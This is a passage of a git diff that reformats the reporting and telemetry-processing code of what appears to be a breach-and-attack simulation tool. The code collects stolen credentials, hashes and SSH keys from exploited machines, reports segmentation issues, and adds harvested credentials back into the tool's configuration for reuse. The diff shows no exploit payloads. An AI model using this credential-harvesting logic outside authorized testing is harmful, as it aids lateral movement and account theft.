key_pair["private_key"] + and { + "username": key_pair["name"], + "type": "Clear SSH private key", + "origin": origin, + } + not in creds + ] creds.extend(ssh_keys) return creds @@ -235,23 +296,25 @@ class ReportService: """ creds = [] for telem in mongo.db.telemetry.find( - {'telem_category': 'system_info', 'data.Azure': {'$exists': True}}, - {'data.Azure': 1, 'monkey_guid': 1} + {"telem_category": "system_info", "data.Azure": {"$exists": True}}, + {"data.Azure": 1, "monkey_guid": 1}, ): - azure_users = telem['data']['Azure']['usernames'] + azure_users = telem["data"]["Azure"]["usernames"] if len(azure_users) == 0: continue - origin = NodeService.get_monkey_by_guid(telem['monkey_guid'])['hostname'] - azure_leaked_users = [{'username': user.replace(',', '.'), 'type': 'Clear Password', - 'origin': origin} for user in azure_users] + origin = NodeService.get_monkey_by_guid(telem["monkey_guid"])["hostname"] + azure_leaked_users = [ + {"username": user.replace(",", "."), "type": "Clear Password", "origin": origin} + for user in azure_users + ] creds.extend(azure_leaked_users) - logger.info('Azure machines creds generated for reporting') + logger.info("Azure machines creds generated for reporting") return creds @staticmethod def process_exploit(exploit) -> ExploiterReportInfo: - exploiter_type = exploit['data']['exploiter'] + exploiter_type = exploit["data"]["exploiter"] exploiter_descriptor = ExploiterDescriptorEnum.get_by_class_name(exploiter_type) processor = exploiter_descriptor.processor() exploiter_info = processor.get_exploit_info_by_dict(exploiter_type, exploit) @@ -259,11 +322,16 @@ class ReportService: @staticmethod def get_exploits() -> List[dict]: - query = [{'$match': {'telem_category': 'exploit', 'data.result': True}}, - {'$group': {'_id': {'ip_address': '$data.machine.ip_addr'}, - 'data': {'$first': '$$ROOT'}, - }}, - {"$replaceRoot": {"newRoot": "$data"}}] + query = [ + {"$match": {"telem_category": "exploit", "data.result": True}}, + { + "$group": { + "_id": {"ip_address": "$data.machine.ip_addr"}, + "data": {"$first": "$$ROOT"}, + } + }, + {"$replaceRoot": {"newRoot": "$data"}}, + ] exploits = [] for exploit in mongo.db.telemetry.aggregate(query): new_exploit = ReportService.process_exploit(exploit) @@ -274,26 +342,26 @@ class ReportService: @staticmethod def get_monkey_subnets(monkey_guid): network_info = mongo.db.telemetry.find_one( - {'telem_category': 'system_info', - 'monkey_guid': monkey_guid}, - {'data.network_info.networks': 1} + {"telem_category": "system_info", "monkey_guid": monkey_guid}, + {"data.network_info.networks": 1}, ) if network_info is None or not network_info["data"]: return [] - return \ - [ - ipaddress.ip_interface(str(network['addr'] + '/' + network['netmask'])).network - for network in network_info['data']['network_info']['networks'] - ] + return [ + ipaddress.ip_interface(str(network["addr"] + "/" + network["netmask"])).network + for network in network_info["data"]["network_info"]["networks"] + ] @staticmethod def get_island_cross_segment_issues(): issues = [] island_ips = local_ip_addresses() - for monkey in mongo.db.monkey.find({'tunnel': {'$exists': False}}, {'tunnel': 1, 'guid': 1, 'hostname': 1}): + for monkey in mongo.db.monkey.find( + {"tunnel": {"$exists": False}}, {"tunnel": 1, "guid": 1, "hostname": 1} + ): found_good_ip = False - monkey_subnets = ReportService.get_monkey_subnets(monkey['guid']) + monkey_subnets = ReportService.get_monkey_subnets(monkey["guid"]) for subnet in monkey_subnets: for ip in island_ips: if ipaddress.ip_address(str(ip)) in subnet: @@ -303,9 +371,12 @@ class ReportService: break if not found_good_ip: issues.append( - {'type': 'island_cross_segment', 'machine': monkey['hostname'], - 'networks': [str(subnet) for subnet in monkey_subnets], - 'server_networks': [str(subnet) for subnet in get_subnets()]} + { + "type": "island_cross_segment", + "machine": monkey["hostname"], + "networks": [str(subnet) for subnet in monkey_subnets], + "server_networks": [str(subnet) for subnet in get_subnets()], + } ) return issues @@ -321,10 +392,10 @@ class ReportService: """ cross_segment_issues = [] - for monkey in mongo.db.monkey.find({}, {'ip_addresses': 1, 'hostname': 1}): + for monkey in mongo.db.monkey.find({}, {"ip_addresses": 1, "hostname": 1}): ip_in_src = None ip_in_dst = None - for ip_addr in monkey['ip_addresses']: + for ip_addr in monkey["ip_addresses"]: if source_subnet_range.is_in_range(str(ip_addr)): ip_in_src = ip_addr break @@ -333,7 +404,7 @@ class ReportService: if not ip_in_src: continue - for ip_addr in monkey['ip_addresses']: + for ip_addr in monkey["ip_addresses"]: if target_subnet_range.is_in_range(str(ip_addr)): ip_in_dst = ip_addr break @@ -341,12 +412,13 @@ class ReportService: if ip_in_dst: cross_segment_issues.append( { - 'source': ip_in_src, - 'hostname': monkey['hostname'], - 'target': ip_in_dst, - 'services': None, - 'is_self': True - }) + "source": ip_in_src, + "hostname": monkey["hostname"], + "target": ip_in_dst, + "services": None, + "is_self": True, + } + ) return cross_segment_issues @@ -369,26 +441,28 @@ class ReportService: scans.rewind() # If we iterated over scans already we need to rewind. for scan in scans: - target_ip = scan['data']['machine']['ip_addr'] + target_ip = scan["data"]["machine"]["ip_addr"] if target_subnet_range.is_in_range(str(target_ip)): - monkey = NodeService.get_monkey_by_guid(scan['monkey_guid']) - cross_segment_ip = get_ip_in_src_and_not_in_dst(monkey['ip_addresses'], - source_subnet_range, - target_subnet_range) + monkey = NodeService.get_monkey_by_guid(scan["monkey_guid"]) + cross_segment_ip = get_ip_in_src_and_not_in_dst( + monkey["ip_addresses"], source_subnet_range, target_subnet_range + ) if cross_segment_ip is not None: cross_segment_issues.append( { - 'source': cross_segment_ip, - 'hostname': monkey['hostname'], - 'target': target_ip, - 'services': scan['data']['machine']['services'], - 'icmp': scan['data']['machine']['icmp'], - 'is_self': False - }) + "source": cross_segment_ip, + "hostname": monkey["hostname"], + "target": target_ip, + "services": scan["data"]["machine"]["services"], + "icmp": scan["data"]["machine"]["icmp"], + "is_self": False, + } + ) return cross_segment_issues + ReportService.get_cross_segment_issues_of_single_machine( - source_subnet_range, target_subnet_range) + source_subnet_range, target_subnet_range + ) @staticmethod def get_cross_segment_issues_per_subnet_group(scans, subnet_group): @@ -404,22 +478,31 @@ class ReportService: for subnet_pair in itertools.product(subnet_group, subnet_group): source_subnet = subnet_pair[0] target_subnet = subnet_pair[1] - pair_issues = ReportService.get_cross_segment_issues_per_subnet_pair(scans, source_subnet, target_subnet) + pair_issues = ReportService.get_cross_segment_issues_per_subnet_pair( + scans, source_subnet, target_subnet + ) if len(pair_issues) != 0: cross_segment_issues.append( { - 'source_subnet': source_subnet, - 'target_subnet': target_subnet, - 'issues': pair_issues - }) + "source_subnet": source_subnet, + "target_subnet": target_subnet, + "issues": pair_issues, + } + ) return cross_segment_issues @staticmethod def get_cross_segment_issues(): - scans = mongo.db.telemetry.find({'telem_category': 'scan'}, - {'monkey_guid': 1, 'data.machine.ip_addr': 1, 'data.machine.services': 1, - 'data.machine.icmp': 1}) + scans = mongo.db.telemetry.find( + {"telem_category": "scan"}, + { + "monkey_guid": 1, + "data.machine.ip_addr": 1, + "data.machine.services": 1, + "data.machine.icmp": 1, + }, + ) cross_segment_issues = [] @@ -427,7 +510,9 @@ class ReportService: subnet_groups = get_config_network_segments_as_subnet_groups() for subnet_group in subnet_groups: - cross_segment_issues += ReportService.get_cross_segment_issues_per_subnet_group(scans, subnet_group) + cross_segment_issues += ReportService.get_cross_segment_issues_per_subnet_group( + scans, subnet_group + ) return cross_segment_issues @@ -440,30 +525,35 @@ class ReportService: issues = functools.reduce(lambda acc, issue_gen: acc + issue_gen(), ISSUE_GENERATORS, []) domain_issues_dict = {} for issue in issues: - if not issue.get('is_local', True): - machine = issue.get('machine').upper() - aws_instance_id = ReportService.get_machine_aws_instance_id(issue.get('machine')) + if not issue.get("is_local", True): + machine = issue.get("machine").upper() + aws_instance_id = ReportService.get_machine_aws_instance_id(issue.get("machine")) if machine not in domain_issues_dict: domain_issues_dict[machine] = [] if aws_instance_id: - issue['aws_instance_id'] = aws_instance_id + issue["aws_instance_id"] = aws_instance_id domain_issues_dict[machine].append(issue) - logger.info('Domain issues generated for reporting') + logger.info("Domain issues generated for reporting") return domain_issues_dict @staticmethod def get_machine_aws_instance_id(hostname): - aws_instance_id_list = list(mongo.db.monkey.find({'hostname': hostname}, {'aws_instance_id': 1})) + aws_instance_id_list = list( + mongo.db.monkey.find({"hostname": hostname}, {"aws_instance_id": 1}) + ) if aws_instance_id_list: - if 'aws_instance_id' in aws_instance_id_list[0]: - return str(aws_instance_id_list[0]['aws_instance_id']) + if "aws_instance_id" in aws_instance_id_list[0]: + return str(aws_instance_id_list[0]["aws_instance_id"]) else: return None @staticmethod def get_manual_monkeys(): - return [monkey['hostname'] for monkey in mongo.db.monkey.find({}, {'hostname': 1, 'parent': 1, 'guid': 1}) if - NodeService.get_monkey_manual_run(monkey)] + return [ + monkey["hostname"] + for monkey in mongo.db.monkey.find({}, {"hostname": 1, "parent": 1, "guid": 1}) + if NodeService.get_monkey_manual_run(monkey) + ] @staticmethod def get_config_users(): @@ -482,10 +572,11 @@ class ReportService: exploits = ConfigService.get_config_value(exploits_config_value, True, True) if exploits == default_exploits: - return ['default'] + return ["default"] - return [ExploiterDescriptorEnum.get_by_class_name(exploit).display_name - for exploit in exploits] + return [ + ExploiterDescriptorEnum.get_by_class_name(exploit).display_name for exploit in exploits + ] @staticmethod def get_config_ips(): @@ -508,29 +599,36 @@ class ReportService: elif ReportService._is_zerologon_pass_restore_failed(issue): issue_set.add(ReportService.DerivedIssueEnum.ZEROLOGON_PASS_RESTORE_FAILED) - issue_set.add(issue['type']) + issue_set.add(issue["type"]) return issue_set @staticmethod - def _is_weak_credential_issue(issue: dict, config_usernames: List[str], config_passwords: List[str]) -> bool: + def _is_weak_credential_issue( + issue: dict, config_usernames: List[str], config_passwords: List[str] + ) -> bool: # Only credential exploiter issues have 'credential_type' - return 'credential_type' in issue and \ - issue['credential_type'] == CredentialType.PASSWORD.value and \ - issue['password'] in config_passwords and \ - issue['username'] in config_usernames + return ( + "credential_type" in issue + and issue["credential_type"] == CredentialType.PASSWORD.value + and issue["password"] in config_passwords + and issue["username"] in config_usernames + ) @staticmethod def _is_stolen_credential_issue(issue: dict) -> bool: # Only credential exploiter issues have 'credential_type' - return 'credential_type' in issue and \ - (issue['credential_type'] == CredentialType.PASSWORD.value or - issue['credential_type'] == CredentialType.HASH.value) + return "credential_type" in issue and ( + issue["credential_type"] == CredentialType.PASSWORD.value + or issue["credential_type"] == CredentialType.HASH.value + ) @staticmethod def _is_zerologon_pass_restore_failed(issue: dict): - return issue['type'] == ExploiterDescriptorEnum.ZEROLOGON.value.class_name \ - and not issue['password_restored'] + return ( + issue["type"] == ExploiterDescriptorEnum.ZEROLOGON.value.class_name + and not issue["password_restored"] + ) @staticmethod def is_report_generated(): @@ -549,40 +647,32 @@ class ReportService: scanned_nodes = ReportService.get_scanned() exploited_nodes = ReportService.get_exploited() - report = \ - { - 'overview': - { - 'manual_monkeys': ReportService.get_manual_monkeys(), - 'config_users': config_users, - 'config_passwords': config_passwords, - 'config_exploits': ReportService.get_config_exploits(), - 'config_ips': ReportService.get_config_ips(), - 'config_scan': ReportService.get_config_scan(), - 'monkey_start_time': ReportService.get_first_monkey_time().strftime("%d/%m/%Y %H:%M:%S"), - 'monkey_duration': ReportService.get_monkey_duration(), - 'issues': issue_set, - 'cross_segment_issues': cross_segment_issues - }, - 'glance': - { - 'scanned': scanned_nodes, - 'exploited': exploited_nodes, - 'stolen_creds': ReportService.get_stolen_creds(), - 'azure_passwords': ReportService.get_azure_creds(), - 'ssh_keys': ReportService.get_ssh_keys(), - 'strong_users': PTHReportService.get_strong_users_on_crit_details() - }, - 'recommendations': - { - 'issues': issues, - 'domain_issues': domain_issues - }, - 'meta': - { - 'latest_monkey_modifytime': monkey_latest_modify_time - } - } + report = { + "overview": { + "manual_monkeys": ReportService.get_manual_monkeys(), + "config_users": config_users, + "config_passwords": config_passwords, + "config_exploits": ReportService.get_config_exploits(), + "config_ips": ReportService.get_config_ips(), + "config_scan": ReportService.get_config_scan(), + "monkey_start_time": ReportService.get_first_monkey_time().strftime( + "%d/%m/%Y %H:%M:%S" + ), + "monkey_duration": ReportService.get_monkey_duration(), + "issues": issue_set, + "cross_segment_issues": cross_segment_issues, + }, + "glance": { + "scanned": scanned_nodes, + "exploited": exploited_nodes, + "stolen_creds": ReportService.get_stolen_creds(), + "azure_passwords": ReportService.get_azure_creds(), + "ssh_keys": ReportService.get_ssh_keys(), + "strong_users": PTHReportService.get_strong_users_on_crit_details(), + }, + "recommendations": {"issues": issues, "domain_issues": domain_issues}, + "meta": {"latest_monkey_modifytime": monkey_latest_modify_time}, + } ReportExporterManager().export(report) mongo.db.report.drop() mongo.db.report.insert_one(ReportService.encode_dot_char_before_mongo_insert(report)) @@ -597,22 +687,22 @@ class ReportService: ReportService.get_island_cross_segment_issues, ReportService.get_azure_issues, PTHReportService.get_duplicated_passwords_issues, - PTHReportService.get_strong_users_on_crit_issues + PTHReportService.get_strong_users_on_crit_issues, ] issues = functools.reduce(lambda acc, issue_gen: acc + issue_gen(), ISSUE_GENERATORS, []) issues_dict = {} for issue in issues: - if issue.get('is_local', True): - machine = issue.get('machine').upper() - aws_instance_id = ReportService.get_machine_aws_instance_id(issue.get('machine')) + if issue.get("is_local", True): + machine = issue.get("machine").upper() + aws_instance_id = ReportService.get_machine_aws_instance_id(issue.get("machine")) if machine not in issues_dict: issues_dict[machine] = [] if aws_instance_id: - issue['aws_instance_id'] = aws_instance_id + issue["aws_instance_id"] = aws_instance_id issues_dict[machine].append(issue) - logger.info('Issues generated for reporting') + logger.info("Issues generated for reporting") return issues_dict @staticmethod @@ -622,7 +712,7 @@ class ReportService: ,,, combo instead. :return: dict with formatted keys with no dots. """ - report_as_json = json_util.dumps(report_dict).replace('.', ',,,') + report_as_json = json_util.dumps(report_dict).replace(".", ",,,") return json_util.loads(report_as_json) @staticmethod @@ -631,10 +721,10 @@ class ReportService: This function checks if a monkey report was already generated and if it's the latest one. :return: True if report is the latest one, False if there isn't a report or its not the latest. """ - latest_report_doc = mongo.db.report.find_one({}, {'meta.latest_monkey_modifytime': 1}) + latest_report_doc = mongo.db.report.find_one({}, {"meta.latest_monkey_modifytime": 1}) if latest_report_doc: - report_latest_modifytime = latest_report_doc['meta']['latest_monkey_modifytime'] + report_latest_modifytime = latest_report_doc["meta"]["latest_monkey_modifytime"] latest_monkey_modifytime = Monkey.get_latest_modifytime() return report_latest_modifytime == latest_monkey_modifytime @@ -648,7 +738,9 @@ class ReportService: """ delete_result = mongo.db.report.delete_many({}) if mongo.db.report.count_documents({}) != 0: - raise RuntimeError("Report cache not cleared. DeleteResult: " + delete_result.raw_result) + raise RuntimeError( + "Report cache not cleared. DeleteResult: " + delete_result.raw_result + ) @staticmethod def decode_dot_char_before_mongo_insert(report_dict): @@ -656,7 +748,7 @@ class ReportService: this function replaces the ',,,' combo with the '.' char instead. :return: report dict with formatted keys (',,,' -> '.') """ - report_as_json = json_util.dumps(report_dict).replace(',,,', '.') + report_as_json = json_util.dumps(report_dict).replace(",,,", ".") return json_util.loads(report_as_json) @staticmethod @@ -667,6 +759,9 @@ class ReportService: @staticmethod def did_exploit_type_succeed(exploit_type): - return mongo.db.edge.count( - {'exploits': {'$elemMatch': {'exploiter': exploit_type, 'result': True}}}, - limit=1) > 0 + return ( + mongo.db.edge.count( + {"exploits": {"$elemMatch": {"exploiter": exploit_type, "result": True}}}, limit=1 + ) + > 0 + ) diff --git a/monkey/monkey_island/cc/services/reporting/report_exporter_manager.py b/monkey/monkey_island/cc/services/reporting/report_exporter_manager.py index 865556b0d..00414028f 100644 --- a/monkey/monkey_island/cc/services/reporting/report_exporter_manager.py +++ b/monkey/monkey_island/cc/services/reporting/report_exporter_manager.py @@ -1,6 +1,6 @@ import logging -__author__ = 'maor.rayzin' +__author__ = "maor.rayzin" logger = logging.getLogger(__name__) @@ -30,4 +30,4 @@ class ReportExporterManager(object, metaclass=Singleton): try: exporter().handle_report(report) except Exception as e: - logger.exception('Failed to export report, error: ' + e) + logger.exception("Failed to export report, error: " + e) diff --git a/monkey/monkey_island/cc/services/reporting/report_generation_synchronisation.py b/monkey/monkey_island/cc/services/reporting/report_generation_synchronisation.py index 30e406e9f..dec13e6d6 100644 --- a/monkey/monkey_island/cc/services/reporting/report_generation_synchronisation.py +++ b/monkey/monkey_island/cc/services/reporting/report_generation_synchronisation.py @@ -28,6 +28,7 @@ def safe_generate_reports(): def safe_generate_regular_report(): # Local import to avoid circular imports from monkey_island.cc.services.reporting.report import ReportService + try: __regular_report_generating_lock.acquire() report = ReportService.generate_report() @@ -39,6 +40,7 @@ def safe_generate_regular_report(): def safe_generate_attack_report(): # Local import to avoid circular imports from monkey_island.cc.services.attack.attack_report import AttackReportService + try: __attack_report_generating_lock.acquire() attack_report = AttackReportService.generate_new_report() diff --git a/monkey/monkey_island/cc/services/reporting/test_report.py b/monkey/monkey_island/cc/services/reporting/test_report.py index 5f95eae47..cf446c757 100644 --- a/monkey/monkey_island/cc/services/reporting/test_report.py +++ b/monkey/monkey_island/cc/services/reporting/test_report.py @@ -4,48 +4,59 @@ from copy import deepcopy from monkey_island.cc.services.reporting.report import ReportService NODE_DICT = { - 'id': '602f62118e30cf35830ff8e4', - 'label': 'WinDev2010Eval.mshome.net', - 'group': 'monkey_windows', - 'os': 'windows', - 'dead': True, - 'exploits': [{'result': True, - 'exploiter': 'DrupalExploiter', - 'info': {'display_name': 'Drupal Server', - 'started': datetime.datetime(2021, 2, 19, 9, 0, 14, 950000), - 'finished': datetime.datetime(2021, 2, 19, 9, 0, 14, 950000), - 'vulnerable_urls': [], - 'vulnerable_ports': [], - 'executed_cmds': []}, - 'attempts': [], - 'timestamp': datetime.datetime(2021, 2, 19, 9, 0, 14, 984000), - 'origin': 'MonkeyIsland : 192.168.56.1'}, - - {'result': True, - 'exploiter': 'ElasticGroovyExploiter', - 'info': {'display_name': 'Elastic search', - 'started': datetime.datetime(2021, 2, 19, 9, 0, 15, 16000), - 'finished': datetime.datetime(2021, 2, 19, 9, 0, 15, 17000), - 'vulnerable_urls': [], 'vulnerable_ports': [], 'executed_cmds': []}, - 'attempts': [], - 'timestamp': datetime.datetime(2021, 2, 19, 9, 0, 15, 60000), - 'origin': 'MonkeyIsland : 192.168.56.1'}] + "id": "602f62118e30cf35830ff8e4", + "label": "WinDev2010Eval.mshome.net", + "group": "monkey_windows", + "os": "windows", + "dead": True, + "exploits": [ + { + "result": True, + "exploiter": "DrupalExploiter", + "info": { + "display_name": "Drupal Server", + "started": datetime.datetime(2021, 2, 19, 9, 0, 14, 950000), + "finished": datetime.datetime(2021, 2, 19, 9, 0, 14, 950000), + "vulnerable_urls": [], + "vulnerable_ports": [], + "executed_cmds": [], + }, + "attempts": [], + "timestamp": datetime.datetime(2021, 2, 19, 9, 0, 14, 984000), + "origin": "MonkeyIsland : 192.168.56.1", + }, + { + "result": True, + "exploiter": "ElasticGroovyExploiter", + "info": { + "display_name": "Elastic search", + "started": datetime.datetime(2021, 2, 19, 9, 0, 15, 16000), + "finished": datetime.datetime(2021, 2, 19, 9, 0, 15, 17000), + "vulnerable_urls": [], + "vulnerable_ports": [], + "executed_cmds": [], + }, + "attempts": [], + "timestamp": datetime.datetime(2021, 2, 19, 9, 0, 15, 60000), + "origin": "MonkeyIsland : 192.168.56.1", + }, + ], } NODE_DICT_DUPLICATE_EXPLOITS = deepcopy(NODE_DICT) -NODE_DICT_DUPLICATE_EXPLOITS['exploits'][1] = NODE_DICT_DUPLICATE_EXPLOITS['exploits'][0] +NODE_DICT_DUPLICATE_EXPLOITS["exploits"][1] = NODE_DICT_DUPLICATE_EXPLOITS["exploits"][0] NODE_DICT_FAILED_EXPLOITS = deepcopy(NODE_DICT) -NODE_DICT_FAILED_EXPLOITS['exploits'][0]['result'] = False -NODE_DICT_FAILED_EXPLOITS['exploits'][1]['result'] = False +NODE_DICT_FAILED_EXPLOITS["exploits"][0]["result"] = False +NODE_DICT_FAILED_EXPLOITS["exploits"][1]["result"] = False def test_get_exploits_used_on_node(): exploits = ReportService.get_exploits_used_on_node(NODE_DICT) - assert sorted(exploits) == sorted(['Elastic Groovy Exploiter', 'Drupal Server Exploiter']) + assert sorted(exploits) == sorted(["Elastic Groovy Exploiter", "Drupal Server Exploiter"]) exploits = ReportService.get_exploits_used_on_node(NODE_DICT_DUPLICATE_EXPLOITS) - assert exploits == ['Drupal Server Exploiter'] + assert exploits == ["Drupal Server Exploiter"] exploits = ReportService.get_exploits_used_on_node(NODE_DICT_FAILED_EXPLOITS) assert exploits == [] diff --git a/monkey/monkey_island/cc/services/representations.py b/monkey/monkey_island/cc/services/representations.py index cd804db50..0193fae0d 100644 --- a/monkey/monkey_island/cc/services/representations.py +++ b/monkey/monkey_island/cc/services/representations.py @@ -6,9 +6,9 @@ from flask import make_response def normalize_obj(obj): - if ('_id' in obj) and ('id' not in obj): - obj['id'] = obj['_id'] - del obj['_id'] + if ("_id" in obj) and ("id" not in obj): + obj["id"] = obj["_id"] + del obj["_id"] for key, value in list(obj.items()): if isinstance(value, bson.objectid.ObjectId): diff --git a/monkey/monkey_island/cc/services/representations_test.py b/monkey/monkey_island/cc/services/representations_test.py index 079cb995f..8aadc0bed 100644 --- a/monkey/monkey_island/cc/services/representations_test.py +++ b/monkey/monkey_island/cc/services/representations_test.py @@ -12,22 +12,15 @@ class TestJsonRepresentations(TestCase): self.assertEqual({}, normalize_obj({})) # no special content - self.assertEqual( - {"a": "a"}, - normalize_obj({"a": "a"}) - ) + self.assertEqual({"a": "a"}, normalize_obj({"a": "a"})) # _id field -> id field - self.assertEqual( - {"id": 12345}, - normalize_obj({"_id": 12345}) - ) + self.assertEqual({"id": 12345}, normalize_obj({"_id": 12345})) # obj id field -> str obj_id_str = "123456789012345678901234" self.assertEqual( - {"id": obj_id_str}, - normalize_obj({"_id": bson.objectid.ObjectId(obj_id_str)}) + {"id": obj_id_str}, normalize_obj({"_id": bson.objectid.ObjectId(obj_id_str)}) ) # datetime -> str @@ -37,18 +30,17 @@ class TestJsonRepresentations(TestCase): self.assertEqual(expected, result) # dicts and lists - self.assertEqual({ - "a": [ - {"ba": obj_id_str, - "bb": obj_id_str} - ], - "b": {"id": obj_id_str} - }, - normalize_obj({ - "a": [ - {"ba": bson.objectid.ObjectId(obj_id_str), - "bb": bson.objectid.ObjectId(obj_id_str)} - ], - "b": {"_id": bson.objectid.ObjectId(obj_id_str)} - }) + self.assertEqual( + {"a": [{"ba": obj_id_str, "bb": obj_id_str}], "b": {"id": obj_id_str}}, + normalize_obj( + { + "a": [ + { + "ba": bson.objectid.ObjectId(obj_id_str), + "bb": bson.objectid.ObjectId(obj_id_str), + } + ], + "b": {"_id": bson.objectid.ObjectId(obj_id_str)}, + } + ), ) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/exploit.py b/monkey/monkey_island/cc/services/telemetry/processing/exploit.py index 9b06b028d..acd8f261b 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/exploit.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/exploit.py @@ -7,8 +7,12 @@ from monkey_island.cc.models import Monkey from monkey_island.cc.services.config import ConfigService from monkey_island.cc.services.edge.displayed_edge import EdgeService from monkey_island.cc.services.node import NodeService -from monkey_island.cc.services.telemetry.processing.utils import get_edge_by_scan_or_exploit_telemetry -from monkey_island.cc.services.telemetry.zero_trust_checks.machine_exploited import check_machine_exploited +from monkey_island.cc.services.telemetry.processing.utils import ( + get_edge_by_scan_or_exploit_telemetry, +) +from monkey_island.cc.services.telemetry.zero_trust_checks.machine_exploited import ( + check_machine_exploited, +) def process_exploit_telemetry(telemetry_json): @@ -19,51 +23,56 @@ def process_exploit_telemetry(telemetry_json): add_exploit_extracted_creds_to_config(telemetry_json) check_machine_exploited( - current_monkey=Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid']), - exploit_successful=telemetry_json['data']['result'], - exploiter=telemetry_json['data']['exploiter'], - target_ip=telemetry_json['data']['machine']['ip_addr'], - timestamp=telemetry_json['timestamp']) + current_monkey=Monkey.get_single_monkey_by_guid(telemetry_json["monkey_guid"]), + exploit_successful=telemetry_json["data"]["result"], + exploiter=telemetry_json["data"]["exploiter"], + target_ip=telemetry_json["data"]["machine"]["ip_addr"], + timestamp=telemetry_json["timestamp"], + ) def add_exploit_extracted_creds_to_config(telemetry_json): - if 'credentials' in telemetry_json['data']['info']: - creds = telemetry_json['data']['info']['credentials'] + if "credentials" in telemetry_json["data"]["info"]: + creds = telemetry_json["data"]["info"]["credentials"] for user in creds: - ConfigService.creds_add_username(creds[user]['username']) - if 'password' in creds[user] and creds[user]['password']: - ConfigService.creds_add_password(creds[user]['password']) - if 'lm_hash' in creds[user] and creds[user]['lm_hash']: - ConfigService.creds_add_lm_hash(creds[user]['lm_hash']) - if 'ntlm_hash' in creds[user] and creds[user]['ntlm_hash']: - ConfigService.creds_add_ntlm_hash(creds[user]['ntlm_hash']) + ConfigService.creds_add_username(creds[user]["username"]) + if "password" in creds[user] and creds[user]["password"]: + ConfigService.creds_add_password(creds[user]["password"]) + if "lm_hash" in creds[user] and creds[user]["lm_hash"]: + ConfigService.creds_add_lm_hash(creds[user]["lm_hash"]) + if "ntlm_hash" in creds[user] and creds[user]["ntlm_hash"]: + ConfigService.creds_add_ntlm_hash(creds[user]["ntlm_hash"]) def update_node_credentials_from_successful_attempts(edge: EdgeService, telemetry_json): - for attempt in telemetry_json['data']['attempts']: - if attempt['result']: - found_creds = {'user': attempt['user']} - for field in ['password', 'lm_hash', 'ntlm_hash', 'ssh_key']: + for attempt in telemetry_json["data"]["attempts"]: + if attempt["result"]: + found_creds = {"user": attempt["user"]} + for field in ["password", "lm_hash", "ntlm_hash", "ssh_key"]: if len(attempt[field]) != 0: found_creds[field] = attempt[field] NodeService.add_credentials_to_node(edge.dst_node_id, found_creds) def update_network_with_exploit(edge: EdgeService, telemetry_json): - telemetry_json['data']['info']['started'] = dateutil.parser.parse(telemetry_json['data']['info']['started']) - telemetry_json['data']['info']['finished'] = dateutil.parser.parse(telemetry_json['data']['info']['finished']) - new_exploit = copy.deepcopy(telemetry_json['data']) - new_exploit.pop('machine') - new_exploit['timestamp'] = telemetry_json['timestamp'] + telemetry_json["data"]["info"]["started"] = dateutil.parser.parse( + telemetry_json["data"]["info"]["started"] + ) + telemetry_json["data"]["info"]["finished"] = dateutil.parser.parse( + telemetry_json["data"]["info"]["finished"] + ) + new_exploit = copy.deepcopy(telemetry_json["data"]) + new_exploit.pop("machine") + new_exploit["timestamp"] = telemetry_json["timestamp"] edge.update_based_on_exploit(new_exploit) - if new_exploit['result']: + if new_exploit["result"]: NodeService.set_node_exploited(edge.dst_node_id) def encrypt_exploit_creds(telemetry_json): - attempts = telemetry_json['data']['attempts'] + attempts = telemetry_json["data"]["attempts"] for i in range(len(attempts)): - for field in ['password', 'lm_hash', 'ntlm_hash']: + for field in ["password", "lm_hash", "ntlm_hash"]: credential = attempts[i][field] if len(credential) > 0: attempts[i][field] = get_encryptor().enc(credential) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py b/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py index b06b638c8..be7b6e7ea 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py @@ -3,15 +3,17 @@ import copy from common.common_consts.post_breach_consts import POST_BREACH_COMMUNICATE_AS_NEW_USER from monkey_island.cc.database import mongo from monkey_island.cc.models import Monkey -from monkey_island.cc.services.telemetry.zero_trust_checks.communicate_as_new_user import check_new_user_communication +from monkey_island.cc.services.telemetry.zero_trust_checks.communicate_as_new_user import ( + check_new_user_communication, +) EXECUTION_WITHOUT_OUTPUT = "(PBA execution produced no output)" def process_communicate_as_new_user_telemetry(telemetry_json): - current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid']) - message = telemetry_json['data']['result'][0] - success = telemetry_json['data']['result'][1] + current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json["monkey_guid"]) + message = telemetry_json["data"]["result"][0] + success = telemetry_json["data"]["result"][1] check_new_user_communication(current_monkey, success, message) @@ -23,35 +25,35 @@ POST_BREACH_TELEMETRY_PROCESSING_FUNCS = { def process_post_breach_telemetry(telemetry_json): def convert_telem_data_to_list(data): modified_data = [data] - if type(data['result'][0]) is list: # multiple results in one pba + if type(data["result"][0]) is list: # multiple results in one pba modified_data = separate_results_to_single_pba_telems(data) return modified_data def separate_results_to_single_pba_telems(data): modified_data = [] - for result in data['result']: + for result in data["result"]: temp = copy.deepcopy(data) - temp['result'] = result + temp["result"] = result modified_data.append(temp) return modified_data def add_message_for_blank_outputs(data): - if not data['result'][0]: - data['result'][0] = EXECUTION_WITHOUT_OUTPUT + if not data["result"][0]: + data["result"][0] = EXECUTION_WITHOUT_OUTPUT return data post_breach_action_name = telemetry_json["data"]["name"] if post_breach_action_name in POST_BREACH_TELEMETRY_PROCESSING_FUNCS: POST_BREACH_TELEMETRY_PROCESSING_FUNCS[post_breach_action_name](telemetry_json) - telemetry_json['data'] = convert_telem_data_to_list(telemetry_json['data']) + telemetry_json["data"] = convert_telem_data_to_list(telemetry_json["data"]) - for pba_data in telemetry_json['data']: + for pba_data in telemetry_json["data"]: pba_data = add_message_for_blank_outputs(pba_data) update_data(telemetry_json, pba_data) def update_data(telemetry_json, data): mongo.db.monkey.update( - {'guid': telemetry_json['monkey_guid']}, - {'$push': {'pba_results': data}}) + {"guid": telemetry_json["monkey_guid"]}, {"$push": {"pba_results": data}} + ) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/processing.py b/monkey/monkey_island/cc/services/telemetry/processing/processing.py index 151fd672f..667928d3c 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/processing.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/processing.py @@ -11,27 +11,28 @@ from monkey_island.cc.services.telemetry.processing.tunnel import process_tunnel logger 